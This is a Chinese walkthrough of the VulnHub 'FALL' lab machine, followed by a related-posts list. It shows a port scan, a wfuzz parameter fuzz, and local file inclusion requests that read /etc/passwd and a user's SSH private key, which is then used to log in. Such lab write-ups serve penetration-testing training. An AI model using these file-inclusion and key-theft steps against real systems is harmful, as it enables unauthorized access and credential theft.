VulnHub-FALL通关攻略

第一步:确定靶机IP为192.168.40.129
第二步:扫描后台及开放端口
复制代码
#开放端口
22 --- ssh
25 --- SMTP简单邮件传输协议
80 --- HTTP万维网传输信息协议
110 --- POP3邮件协议3
139 --- NetBIOS服务
443 --- 	https服务
445 --- SMB协议
3306 --- Mysql
8080 --- Internet 信息服务
第三步:尝试访问扫到的端口和文件
第四步:尝试使用kali自带的FUZZ
复制代码
#使用kali自带的FUZZ
wfuzz -u "http://192.168.40.129/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80
第五步:尝试访问/etc/passwd敏感文件,发现qiu用户,且权限为1000
复制代码
#/etc/passwd
http://192.168.40.129/test.php?file=/etc/passwd
第六步:尝试查看用户qiu的 ssh 密钥
复制代码
#查看用户qiu的 ssh 密钥  
http://192.168.40.129/test.php?file=/home/qiu/.ssh/id_rsa
第七步:尝试利用文件包含来得到qiu的ssh私钥文件,并使用cat查看
复制代码
#得到ssh私钥文件
curl http://192.168.40.129/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa
第八步:给予密钥文件权限为600,以正常使用
复制代码
chmod 600 id_rsa
第九步:使用这个私钥登录qiu用户,发现连接成功
复制代码
 ssh -i id_rsa [email protected]

FROM IYU_

相关推荐
秋说31 分钟前
【区块链安全 | 第十二篇】安装 Solidity 编译器(npm | docker | Linux | macOS)
安全·npm·区块链
不一样的信息安全41 分钟前
AI渗透测试:网络安全的“黑魔法”还是“白魔法”?
人工智能·安全·web安全
神经毒素1 小时前
WEB安全--SQL注入--MySQL提权
安全·web安全·mysql提权
.M1ke.2 小时前
vulhub靶场—— Tomcat8
web安全·中间件
智联视频超融合平台4 小时前
智能巡检机器人:2025年企业安全运维的“数字哨兵“
运维·安全·机器人·音视频·实时音视频·视频编解码
胡译胡说5 小时前
PHP又出Bug了?md5('240610708')竟然等于 md5('QNKCDZO')!
安全·php·代码规范
SecPulse5 小时前
流影---开源网络流量分析平台(四)(分析引擎部署)
运维·服务器·人工智能·网络安全·开源·流影
浩浩测试一下5 小时前
网络安全之超强Linux信息收集:渗透测试与应急响应的基石(命令超强集合工作手册)
linux·运维·服务器·安全·web安全·网络安全·系统安全
金丝猴也是猿9 小时前
手机硬件检测详解:从版本信息到相机功能的全面指南
websocket·网络协议·tcp/ip·http·网络安全·https·udp